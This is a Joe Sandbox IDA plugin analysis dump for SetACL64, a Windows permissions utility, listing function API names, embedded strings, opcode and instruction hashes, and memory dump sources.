                              • String ID: Type 'SetACL -help' for help.$ could not be processed!$ could not be set!$ in a parameter option -ace specified: $ in a parameter option -dom specified: $ in a parameter option -lst specified: $ in a parameter option -op specified: $ in a parameter option -os specified: $ in a parameter option -trst specified: $-ace$-actn$-bckp$-clr$-dom$-fltr$-grp$-help$-ignoreerr$-log$-lst$-on$-op$-os$-ot$-ownr$-raw$-rec$-rst$-silent$-trst$> in a parameter option -ace specified: $> in a parameter option -dom specified: $> in a parameter option -grp specified: $> in a parameter option -lst specified: $> in a parameter option -op specified: $> in a parameter option -ownr specified: $> in a parameter option -trst specified: $ERROR (internal) while processing command line: Action: $ERROR (internal) while processing command line: Action: CLEARDACL could not be set!$ERROR (internal) while processing command line: Action: CLEARSACL could not be set!$ERROR (internal) while processing command line: Action: DELORPHANEDSIDS could not be set!$ERROR (internal) while processing command line: Action: RESETCHILDPERMS could not be set!$ERROR (internal) while processing command line: Action: SETINHFROMPAR could not be set!$ERROR (internal) while processing command line: Backup/Restore file: $ERROR (internal) while processing command line: list options: $ERROR (internal) while processing command line: object flags: $ERROR (internal) while processing command line: orphaned SID deletion options: $ERROR (internal) while processing command line: recursion type could not be set!$ERROR in command line: Invalid ACL type (where) entry $ERROR in command line: Invalid access mode entry $ERROR in command line: Invalid action specified: $ERROR in command line: Invalid domain action entry $ERROR in command line: Invalid entry <$ERROR in command line: Invalid inheritance entry $ERROR in command line: Invalid input file (csv) entry in a parameter option -trst specified: $ERROR in command line: Invalid list format entry $ERROR in command line: Invalid list what entry $ERROR in command line: Invalid number of entries in parameter for option -op specified: $ERROR in command line: Invalid object type specified: $ERROR in command line: Invalid option specified: $ERROR in command line: Invalid parameter for option -clr specified: $ERROR in command line: Invalid parameter for option -rst specified: $ERROR in command line: Invalid protection entry $ERROR in command line: Invalid recursion type specified: $ERROR in command line: Invalid trustee action entry $ERROR in command line: No parameter found for option $ERROR while processing command line: ACE: $ERROR while processing command line: Domain: $ERROR while processing command line: Owner: $ERROR while processing command line: Trustee file: $ERROR while processing command line: Trustee: $ERROR while processing command line: object (name, type): $ERROR while processing command line: primary group: $INFO: The restore action ignores the object name parameter (paths are read from the backup file). However, other actions that requ$ProcessCmdLine$WARNING: The parameter <%s> contains a double quotation mark (". Did you unintentionally escape a double quote? Hint: use <"C:\\">$ace$aud_fail$aud_fail,aud_succ$aud_succ$aud_succ,aud_fail$clear$cont$cont_obj$cpydom$cpytrst$csv$dacl$dacl,sacl$delorphanedsids$deny$domain$file$grant$list$obj$own$p_c$p_nc$prn$reg$remdom$remtrst$repldom$repltrst$restore$revoke$rstchldrn$sacl$sacl,dacl$sddl$set$setgroup$setowner$setprot$shr$srv$tab$trustee$wmi$yes
                              • API String ID: 0-425451505
                              • Opcode ID: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                              • Instruction ID: 749e362cb7efab0eecb2a6eddd94ea8c2eed08bf978df002f0876fbd7715e416
                              • Opcode Fuzzy Hash: 6b2fc4d373cf05abc5e4d6a0f530dc29495f5d2a2d032dd04ea78fda412acef8
                              • Instruction Fuzzy Hash: 38D311E1A6A68255EB30EF61D951AFD2360FF913C8F801572D60DDB69BEE2CE605C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AddressProc$HandleModule
                              • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                              • API String ID: 667068680-295688737
                              • Opcode ID: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                              • Instruction ID: bed52894e0620ef47ca13864b2fa0f64d17ccd4c5f4bf783c47d3cc0f01b3076
                              • Opcode Fuzzy Hash: 8c265c905f78d9314ea8cbef84c94e4164f9315dedd1d7019d0be5ccefc16711
                              • Instruction Fuzzy Hash: 2CA1A2E4E09B0791EE249B65BC5406533A1FF697D5F9850B1C84EC7330EEBCA1A9D321
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskDescriptorFreeLocalSecurity$ConvertString
                              • String ID: " $> because a filter keyword matched.$> because neither owner, group, DACL nor SACL were backed up.$> failed with: $>: $DoActionRestore$Input file for restore operation opened: '$Omitting SD of: <$Restoring SD of <$Restoring SD of: <$Writing SD to <
                              • API String ID: 143920484-3190023557
                              • Opcode ID: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                              • Instruction ID: ac4acfcbfe44c145c9b820a93e462284141e57ee72f73a6b67126c35024c583f
                              • Opcode Fuzzy Hash: 15bc8f1a26296f697d3e6f5c2711eff66c31bdb87e4d1b345efa8cdd7b4d4860
                              • Instruction Fuzzy Hash: BCF291A2A15B8289EB309F35D8453ED2361FB547E8F405671EA5DC7AE9DF38E684C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Valid$ErrorLast$DeleteInformation
                              • String ID: > was not found in domain <$Account <$ProcessACEsOfGivenDomains
                              • API String ID: 2636496183-3371799133
                              • Opcode ID: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                              • Instruction ID: a7b627c112c79aacca48c3b66732afeb9745bf41585162551a6b7e60373f3f5c
                              • Opcode Fuzzy Hash: 9a3de9c15898c57846f777a987bea00d9bf1c6b9597bda2110fe323b3954fc78
                              • Instruction Fuzzy Hash: 03828DA2B15B8289EB208B68D8553AD3361FB447E8F504375DA6DC7BD9DF78E280C304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AllocString$DescriptorSecurityValid_invalid_parameter_noinfo_noreturn
                              • String ID: GetSD$SetSD$__systemsecurity$__systemsecurity=@$t5x$$x$2z$w
                              • API String ID: 1218313072-3940533286
                              • Opcode ID: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                              • Instruction ID: b757dad8602f656f7055bd73b6d2e6d2733f8449dc7634eae3619fcdaa6d6985
                              • Opcode Fuzzy Hash: 573fd55f4af3a90e586db8418e43b378526fcc2e4e962f79aabb54a16630bbf7
                              • Instruction Fuzzy Hash: 71F147B2A0AB4286EB24EF65E86136873A0FF44B94F148575DA4DC3794EF3CD694C350
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CloseCurrentHandleLookupOpenPrivilegeTokenValue
                              • String ID: failed with: $ the privilege $Enabling$SetPrivilege
                              • API String ID: 152255395-1151176482
                              • Opcode ID: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                              • Instruction ID: 857b6871a6adf30be20ec56a5d230139b604ecc1dcafafd338734429ff9896a3
                              • Opcode Fuzzy Hash: 98658c3223ea42c8e2fd826e98f666b88e57f772a3a703dd5e8032af214ad707
                              • Instruction Fuzzy Hash: 8DD182A2B18B4281FB209B65D4843AD2371FB957E8F505275EA5DD3AE9EF7CE081D300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                              • API String ID: 808467561-2761157908
                              • Opcode ID: 936cf4456d6ae3aa195b210b09d182522d297c425d5cf5ba6d24be8079477b51
                              • Instruction ID: 677c2c475b39c129f87488022b8e408313fee80d1b54329ff99b23db310ac965
                              • Opcode Fuzzy Hash: 936cf4456d6ae3aa195b210b09d182522d297c425d5cf5ba6d24be8079477b51
                              • Instruction Fuzzy Hash: 74B2C0B2A182828AE7758F78D5407F937A1FB987C8F505175DA0AD7B85DF3AB9408B00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: FreeLibraryString$ByteLoad$AllocErrorFormatLastLocalMessage_invalid_parameter_noinfo_noreturn
                              • String ID: netmsg.dll$pdh.dll
                              • API String ID: 40273658-131213443
                              • Opcode ID: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
                              • Instruction ID: 858affcbe9ef3a894e8c1d2ecae1df9f59772cc1807064ebb7a8f887711457c2
                              • Opcode Fuzzy Hash: 509bcff9dc41729db223f1edf4d17637db7f3b14702afe9ed8d969c13de03bd2
                              • Instruction Fuzzy Hash: 78B1BFB2B08B4286EB208B15E8443AE73A1FB54BE8F544275DA5DC3BA4EF7CE541D740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: DescriptorSecurity$ErrorLastMakeRelativeSelf$DaclGroupOwnerSacl_invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 3822310168-0
                              • Opcode ID: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
                              • Instruction ID: 131e329c7f27ceabeda9469446d2a032b4ebe4c76ad049b18e8fb881d0fb4c88
                              • Opcode Fuzzy Hash: 1a143b5dc0866976304182db4d08a821830a9c3d75e33f02e80d987c8124c854
                              • Instruction Fuzzy Hash: 2D5149E2A09A4281EA64DF61D86A3793365FF90BC8F008172CA4DC76D5EF2CE691C304
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                              • String ID:
                              • API String ID: 3939093798-0
                              • Opcode ID: 0169081db4081aa29c78300c3f8140622a5bf0e0fe167edd77ba9466bcfcc269
                              • Instruction ID: ccb9a368750c030d63208e2b22f329d8321b22435020fbafff6032e1ac983ab7
                              • Opcode Fuzzy Hash: 0169081db4081aa29c78300c3f8140622a5bf0e0fe167edd77ba9466bcfcc269
                              • Instruction Fuzzy Hash: 00715AA2B0864289FB70DBA4D8506F827A0FF84B94F445176CE1DD3789EF3EA445C710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                              • Instruction ID: d62fc92fc40a52eec82bc41cc79e21860a00de81cd88c256f75ad2e4279823ab
                              • Opcode Fuzzy Hash: b089a036664126cd0b55730891b2820b0630cf2b127659524579cdc58d050a6c
                              • Instruction Fuzzy Hash: EE312DB2609A819AEB709F60E8403ED7374FB94798F44443ADA4DC7A95EF38D648C710
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                              • String ID: APPLICATION PACKAGE AUTHORITY$Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
                              • API String ID: 2016263034-1572346215
                              • Opcode ID: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                              • Instruction ID: f667050d192c6c85b6ed7843a37a510560df9a894c18007fe5d90bd8e89c4fe2
                              • Opcode Fuzzy Hash: 1fb07fcdeecce9f14301a7ac34e795235f9f09835de906e15c143d3a66afb55b
                              • Instruction Fuzzy Hash: 75528EA6B06A0684EF20CB66D4942BD37A0FB89FC8B458576CE0EC3764EE3CE555C350
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                              • Instruction ID: e6c3e6d04faa08a0f353fa077cc8a51d49c0b4406d109f1d9ad152497e9bf91f
                              • Opcode Fuzzy Hash: c7e3b804aa443ecddc5aa38c83e1479257d163bfb5c256670d9298fc1dc11c8a
                              • Instruction Fuzzy Hash: D3A1E5A2B18A9581EA30CB2294046FB63B0FB54BD4F4045B6EE5DC7BC4EF7DD4458300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                              • Instruction ID: e247b9436c753e71326c9f9b693a3bca6c3a2011e6fd30589732ea25b52b6596
                              • Opcode Fuzzy Hash: 0c75d53fa4f789302832d1f0c4a661b2f4dd75274d5b0a99b56319323675b894
                              • Instruction Fuzzy Hash: BC314F76618B8196DB60CF25E8402AE73A4FB887A4F540175EA8DC7B95EF38D545CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                              • String ID: %
                              • API String ID: 1283921372-2567322570
                              • Opcode ID: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                              • Instruction ID: 0f7bc9979cf6b292e2444baecdac19a8f2364b1819219b46cba393fc1b858ba6
                              • Opcode Fuzzy Hash: fe15a6ac4528cf41c533b560c1c99647058aec793d08cb73c2d8515a42d6291c
                              • Instruction Fuzzy Hash: FB72DEA2B18A858AEB258F69D4403AD73B2EBA4BC8F445171DE4DD7B98EF3CD445C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite$Console
                              • String ID:
                              • API String ID: 786612050-0
                              • Opcode ID: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
                              • Instruction ID: ef381a67cf3637befbd39b3d7ce548bc12f98937f69ed236f21d3a9f86e93cbe
                              • Opcode Fuzzy Hash: 595654060b954cd898e70031aa38deb9f7488c276e60d446b525d1db4710fac2
                              • Instruction Fuzzy Hash: DDD1F0B2B08A818AE720CB64D4842ED7BB1FB45BD8F544176DE4EC7B99DE39D15AC300
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                              • Instruction ID: 4bd73a73096aa89e849c964a5ccd38c7307227c3eea86dad5dcc02d70be1e891
                              • Opcode Fuzzy Hash: e81314747b826c716fa44dea94a216081fde13e1c2a81abd4463a414bef4ca2a
                              • Instruction Fuzzy Hash: C8B190B2B18A4181EA249B25E85436E73A1EB58BD8F404176DB8CC7B99DF7DE690C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 678723381-0
                              • Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                              • Instruction ID: 579510ea489f01878e66298d50ff1015c6a408c348b2ad3da8e49e06e396f169
                              • Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                              • Instruction Fuzzy Hash: 5741C562A19B8181EA208B24E84536D7361FB95BE4F144234EB9D83BA9EF7CF5C0D700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
